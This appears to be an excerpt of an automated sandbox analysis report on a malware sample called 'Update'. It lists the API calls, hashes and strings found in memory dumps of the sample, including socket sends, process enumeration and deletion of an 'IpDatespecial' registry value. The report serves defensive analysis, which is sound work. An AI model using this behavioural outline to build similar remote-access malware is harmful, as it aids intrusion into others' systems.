                                                                                                • API String ID: 1602911419-0
                                                                                                • Opcode ID: 781f0dead4b04b0b1df728989b60ec0f4a969a1ea6219a1764e7c7fc0b2e53c7
                                                                                                • Instruction ID: 764479df9af616212ea460aa5328a5cff058bb9779f46178939b263f9c67f89d
                                                                                                • Opcode Fuzzy Hash: 781f0dead4b04b0b1df728989b60ec0f4a969a1ea6219a1764e7c7fc0b2e53c7
                                                                                                • Instruction Fuzzy Hash: 2811E4B9D00309DFDF40EFE8C884AAD7BB4FB04210F1081A9E865EB290DB789A519F51
                                                                                                APIs
                                                                                                • __CreateFrameInfo.LIBCMT ref: 100136CB
                                                                                                  • Part of subcall function 1001325B: __getptd.LIBCMT ref: 10013269
                                                                                                  • Part of subcall function 1001325B: __getptd.LIBCMT ref: 10013277
                                                                                                • __getptd.LIBCMT ref: 100136D5
                                                                                                  • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                                                  • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                                                • __getptd.LIBCMT ref: 100136E3
                                                                                                • __getptd.LIBCMT ref: 100136F1
                                                                                                • __getptd.LIBCMT ref: 100136FC
                                                                                                • _CallCatchBlock2.LIBCMT ref: 10013722
                                                                                                  • Part of subcall function 10013300: __CallSettingFrame@12.LIBCMT ref: 1001334C
                                                                                                  • Part of subcall function 100137C9: __getptd.LIBCMT ref: 100137D8
                                                                                                  • Part of subcall function 100137C9: __getptd.LIBCMT ref: 100137E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 1602911419-0
                                                                                                • Opcode ID: 9bbf850cd10a9d142d7ef01923f7ba9f09fdf63f4c6847773a26cfd91f606182
                                                                                                • Instruction ID: 22efbb8b190092b33748bf873c8b025e1b03d977775ae1c5574abea826c94994
                                                                                                • Opcode Fuzzy Hash: 9bbf850cd10a9d142d7ef01923f7ba9f09fdf63f4c6847773a26cfd91f606182
                                                                                                • Instruction Fuzzy Hash: 06112BB5C04209DFDF10DFA4D445AEEBBB1FF48310F10806AF864AB251DB38AA559F50
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 03804891
                                                                                                  • Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
                                                                                                  • Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B
                                                                                                • __amsg_exit.LIBCMT ref: 038048B1
                                                                                                • __lock.LIBCMT ref: 038048C1
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 038048DE
                                                                                                • _free.LIBCMT ref: 038048F1
                                                                                                • InterlockedIncrement.KERNEL32(03992830), ref: 03804909
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                • String ID:
                                                                                                • API String ID: 3470314060-0
                                                                                                • Opcode ID: bb4ecff8e1a2897b73b98ecc2935036c8fdc93f123dc02e1eae50d26c5147f50
                                                                                                • Instruction ID: bb27dc11b4b305ed5e20a63ba32c64a2af7b19cdad7356de1644d18d2ef6a0d9
                                                                                                • Opcode Fuzzy Hash: bb4ecff8e1a2897b73b98ecc2935036c8fdc93f123dc02e1eae50d26c5147f50
                                                                                                • Instruction Fuzzy Hash: DD01A136981B559BE6A0EFEA9C4475DF3A4BF44720F0804D5DA14EB2C0CB746541CFD2
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 1000D9CA
                                                                                                  • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                                                  • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                                                • __amsg_exit.LIBCMT ref: 1000D9EA
                                                                                                • __lock.LIBCMT ref: 1000D9FA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1000DA17
                                                                                                • _free.LIBCMT ref: 1000DA2A
                                                                                                • InterlockedIncrement.KERNEL32(03322830), ref: 1000DA42
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                • String ID:
                                                                                                • API String ID: 3470314060-0
                                                                                                • Opcode ID: 4e920ccd90d0088b349a7666ce33f112c59c5ff822d0f6e49aec8d69fe8d2c9d
                                                                                                • Instruction ID: a4a3804e7546e288cb55bc9b4da126fdc171610eea7e5ea66b0b3240b360b7e5
                                                                                                • Opcode Fuzzy Hash: 4e920ccd90d0088b349a7666ce33f112c59c5ff822d0f6e49aec8d69fe8d2c9d
                                                                                                • Instruction Fuzzy Hash: E2019235A057219BF701EF64988579EB3A1FF057D0F018116F851AB289CB34BA81CBE6
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048E1
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048EC
                                                                                                • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 100048F9
                                                                                                • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 10004914
                                                                                                • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 1000491D
                                                                                                • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 1000492E
                                                                                                  • Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                                                  • Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                                                  • Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
                                                                                                  • Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                                                  • Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
                                                                                                  • Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                                                  • Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                • String ID:
                                                                                                • API String ID: 1019945655-0
                                                                                                • Opcode ID: 3a30db2477d7f785b2e787c45e20f2cfe3e7392a271029e59f364346de097013
                                                                                                • Instruction ID: b3bd2b528433ae293362b27f5e3b1343b14dca1381540b702c4300f5d31fb9dc
                                                                                                • Opcode Fuzzy Hash: 3a30db2477d7f785b2e787c45e20f2cfe3e7392a271029e59f364346de097013
                                                                                                • Instruction Fuzzy Hash: 1AF096762046149BD210EBA9CC84D4BF3E9EFC8761B158B19F26987694CA71FC01CBA0
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(?), ref: 037F9BD2
                                                                                                • EnterCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9BE3
                                                                                                • EnterCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9BF8
                                                                                                • GdiplusShutdown.GDIPLUS(00000000,?,?,?,037F9B7B), ref: 037F9C04
                                                                                                • LeaveCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9C15
                                                                                                • LeaveCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9C1C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                • String ID:
                                                                                                • API String ID: 4268643673-0
                                                                                                • Opcode ID: fdfccc395333c35cc489f02c24fe5e203e278cfef47f0f25f26c4a1fa2e29894
                                                                                                • Instruction ID: 1a1001ba9cc2329fe36aebecd5e634538bcd26e03e484c27d291c307873d23c1
                                                                                                • Opcode Fuzzy Hash: fdfccc395333c35cc489f02c24fe5e203e278cfef47f0f25f26c4a1fa2e29894
                                                                                                • Instruction Fuzzy Hash: 4D011EB5900704DFC704EFAAA89041AFBA9FA4932532486EEE218C7346C376C453CF94
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037F48E1
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037F48EC
                                                                                                • Sleep.KERNEL32(00000258), ref: 037F48F9
                                                                                                • CloseHandle.KERNEL32(?), ref: 037F4914
                                                                                                • CloseHandle.KERNEL32(?), ref: 037F491D
                                                                                                • Sleep.KERNEL32(0000012C), ref: 037F492E
                                                                                                  • Part of subcall function 037F3F60: GetCurrentThreadId.KERNEL32 ref: 037F3F65
                                                                                                  • Part of subcall function 037F3F60: send.WS2_32(?,038149C0,00000010,00000000), ref: 037F3FC6
                                                                                                  • Part of subcall function 037F3F60: SetEvent.KERNEL32(?), ref: 037F3FE9
                                                                                                  • Part of subcall function 037F3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 037F3FF5
                                                                                                  • Part of subcall function 037F3F60: WSACloseEvent.WS2_32(?), ref: 037F4003
                                                                                                  • Part of subcall function 037F3F60: shutdown.WS2_32(?,00000001), ref: 037F401B
                                                                                                  • Part of subcall function 037F3F60: closesocket.WS2_32(?), ref: 037F4025
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                • String ID:
                                                                                                • API String ID: 1019945655-0
                                                                                                • Opcode ID: d09b5e6e86b66d9d1bb0863378b0c08adeb2b85198bad4f8486757e0a4cb084f
                                                                                                • Instruction ID: d9d1e36b5f56926c2f4752fd9d87e8350f60e4b2ebe3692a3ad7503d458659dc
                                                                                                • Opcode Fuzzy Hash: d09b5e6e86b66d9d1bb0863378b0c08adeb2b85198bad4f8486757e0a4cb084f
                                                                                                • Instruction Fuzzy Hash: BBF030763046049BC624EBBDDC84D4BF3E9EFC9720B254B09E26987394CA75E801CBA0
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037F3311
                                                                                                • Sleep.KERNEL32(00000258), ref: 037F331E
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 037F3326
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037F3332
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037F333A
                                                                                                • Sleep.KERNEL32(0000012C), ref: 037F334B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                • String ID:
                                                                                                • API String ID: 3137405945-0
                                                                                                • Opcode ID: 1551b1c7014ff512b6e55fe847478ea19eb1cb391003f1af59a6412e5bfeb187
                                                                                                • Instruction ID: babc1d4263a1cea84ec48c4eb1fa273ffe1edd4f1ead70c3990b640633be8dd8
                                                                                                • Opcode Fuzzy Hash: 1551b1c7014ff512b6e55fe847478ea19eb1cb391003f1af59a6412e5bfeb187
                                                                                                • Instruction Fuzzy Hash: 0AF012762047146BD610EBA9DC84D5AF3ECEF99734B204B49F265932D4CAB5E805CB60
                                                                                                APIs
                                                                                                • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 006E1D85
                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 006E1D92
                                                                                                • _CxxThrowException.VCRUNTIME140(?,006E27B4), ref: 006E1E99
                                                                                                • _CxxThrowException.VCRUNTIME140(?,006E2808), ref: 006E1EB6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e0000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow$_callnewhmalloc
                                                                                                • String ID: Unknown exception
                                                                                                • API String ID: 4113974480-410509341
                                                                                                • Opcode ID: a96718e251a3ae80f6c638ed5f2b1fe7b2a89717b7fd9cb3baca50a01305f099
                                                                                                • Instruction ID: 0ba1154695e183cadf677470a6eff717e895ce3e902863aef4a8a441d1caadfa
                                                                                                • Opcode Fuzzy Hash: a96718e251a3ae80f6c638ed5f2b1fe7b2a89717b7fd9cb3baca50a01305f099
                                                                                                • Instruction Fuzzy Hash: 1FF0F4345023CD73CB04BAABDC269AD77AF5E02310BA08168F9149E191FF70EA45F1C4
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBCMT ref: 0381096E
                                                                                                  • Part of subcall function 038108C9: ___BuildCatchObjectHelper.LIBCMT ref: 038108FF
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 03810985
                                                                                                • ___FrameUnwindToState.LIBCMT ref: 03810993
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                • String ID: csm$csm
                                                                                                • API String ID: 2163707966-3733052814
                                                                                                • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                • Instruction ID: 3dbc904a45e3cf6882f289017d70966b80e7b06bdd2d48bb7116760aace87a8a
                                                                                                • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                • Instruction Fuzzy Hash: 4101E8B5401209BBDF12AF95CC44EEA7F6EFF08350F048094BD5899160D77699B1EBA2
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9AFB9AC3,?,?,00000000,6CABC7DD,000000FF,?,6CAA26D0,6CAA25AA,?,6CAA276C,00000000), ref: 6CAA2644
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CAA2656
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,6CABC7DD,000000FF,?,6CAA26D0,6CAA25AA,?,6CAA276C,00000000), ref: 6CAA2678
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 3bcddd5adfd9d78bac9354cce0868c13bd206077d473bd6ea4fe610b9732c6cf
                                                                                                • Instruction ID: fa6c3aec44e09f31fbfdec1355c11c082093c6210726abd2b0b8af9cd7acc2d3
                                                                                                • Opcode Fuzzy Hash: 3bcddd5adfd9d78bac9354cce0868c13bd206077d473bd6ea4fe610b9732c6cf
                                                                                                • Instruction Fuzzy Hash: DB01673160561AAFDF059F94CC08FEEBBB8FB05715F004A25F822E2690DB759541CB90
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBCMT ref: 10013A63
                                                                                                  • Part of subcall function 100139BE: ___BuildCatchObjectHelper.LIBCMT ref: 100139F4
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 10013A7A
                                                                                                • ___FrameUnwindToState.LIBCMT ref: 10013A88
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                • String ID: csm$csm
                                                                                                • API String ID: 2163707966-3733052814
                                                                                                • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                • Instruction ID: e6390535bab9e49693186baa48b022ad9d19c19648d68c038876df6954aae2ed
                                                                                                • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                • Instruction Fuzzy Hash: AE01F675401109BBDF12DF51CC45EAB7F6AEF08390F508024FD5819121D776E9B1DBA1
                                                                                                APIs
                                                                                                • PeekConsoleInputA.KERNEL32(?,gfff,6CAC9D70,00000000,?,6CAA3746,00000000,0000000C,6CAC9D70,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0B35
                                                                                                • GetLastError.KERNEL32(?,6CAA3746,00000000,0000000C,6CAC9D70,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0B41
                                                                                                  • Part of subcall function 6CAB0C1D: CloseHandle.KERNEL32(FFFFFFFF,6CAB0B05,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C2D
                                                                                                • ___initconin.LIBCMT ref: 6CAB0B51
                                                                                                  • Part of subcall function 6CAB0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CAB0A79,6CAA36CB,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C11
                                                                                                • PeekConsoleInputA.KERNEL32(?,?,FFFFFFFF,?,6CAA3746,00000000,0000000C,6CAC9D70,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0B65
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleInputPeek$CloseCreateErrorFileHandleLast___initconin
                                                                                                • String ID: gfff
                                                                                                • API String ID: 1545762386-1553575800
                                                                                                • Opcode ID: d7147ed2e7ed7db55fd66f382e4e26412f9381724cae3ec78e717fc2c3523cc9
                                                                                                • Instruction ID: 2bb9818882a03509e4ce6e904462a9734b3824122f9733274f8463f2d08b15ee
                                                                                                • Opcode Fuzzy Hash: d7147ed2e7ed7db55fd66f382e4e26412f9381724cae3ec78e717fc2c3523cc9
                                                                                                • Instruction Fuzzy Hash: BCF0E53690025EBBCF166FD5CD049997F76FB093697048110FA19E6520CB32CDA1EF90
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 037FB800
                                                                                                • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 037FB810
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 037FB81B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                • String ID: Console$IpDatespecial
                                                                                                • API String ID: 849931509-1840232981
                                                                                                • Opcode ID: 05c75dc6fd163e741b0fa1f4489c3da0558cb4a54b9e0c624faa1cabfb9d32f5
                                                                                                • Instruction ID: c7956c8aa1503e3d808a24da9b22e9d7b422e50977b1349b23b44827311c074f
                                                                                                • Opcode Fuzzy Hash: 05c75dc6fd163e741b0fa1f4489c3da0558cb4a54b9e0c624faa1cabfb9d32f5
                                                                                                • Instruction Fuzzy Hash: 50E08676245240EFD314E7A0AC4FF9A776CF78C711F004A9DF684E1141C595E551C665
                                                                                                APIs
                                                                                                • __alloca_probe_16.LIBCMT ref: 6CAAD42A
                                                                                                • __alloca_probe_16.LIBCMT ref: 6CAAD4F3
                                                                                                • __freea.LIBCMT ref: 6CAAD55A
                                                                                                  • Part of subcall function 6CAAA641: HeapAlloc.KERNEL32(00000000,6CAADBE2,?,?,6CAADBE2,00000220,?,?,?), ref: 6CAAA673
                                                                                                • __freea.LIBCMT ref: 6CAAD56D
                                                                                                • __freea.LIBCMT ref: 6CAAD57A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1096550386-0
                                                                                                • Opcode ID: 8f26fc40b15d5d9f0a132155b6c8e76b559f0f20ef8b57b290f6d10ddd8d0d72
                                                                                                • Instruction ID: 53deb052fc497a734f133ab8e633987805e0034e902bbfdd5cad7ae5a346fbed
                                                                                                • Opcode Fuzzy Hash: 8f26fc40b15d5d9f0a132155b6c8e76b559f0f20ef8b57b290f6d10ddd8d0d72
                                                                                                • Instruction Fuzzy Hash: 8251C3B2A012076FEB018EE4CD40EFB3BA9DF4571CB290528FD5497A50EB30DC96CA60
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,4EB10097), ref: 037FB9DA
                                                                                                • _memset.LIBCMT ref: 037FB9FB
                                                                                                • _memset.LIBCMT ref: 037FBA4B
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 037FBA65
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 037FBAB7
                                                                                                  • Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2416807333-0
                                                                                                • Opcode ID: c5483adc2990f9dc31f455602de67bb6cba19dda93b4b27feea08cdcfb6223b2
                                                                                                • Instruction ID: fcf1983714ad00ce2424f2a6940d7467326d3b19be16a9c393a753a35a9a6b15
                                                                                                • Opcode Fuzzy Hash: c5483adc2990f9dc31f455602de67bb6cba19dda93b4b27feea08cdcfb6223b2
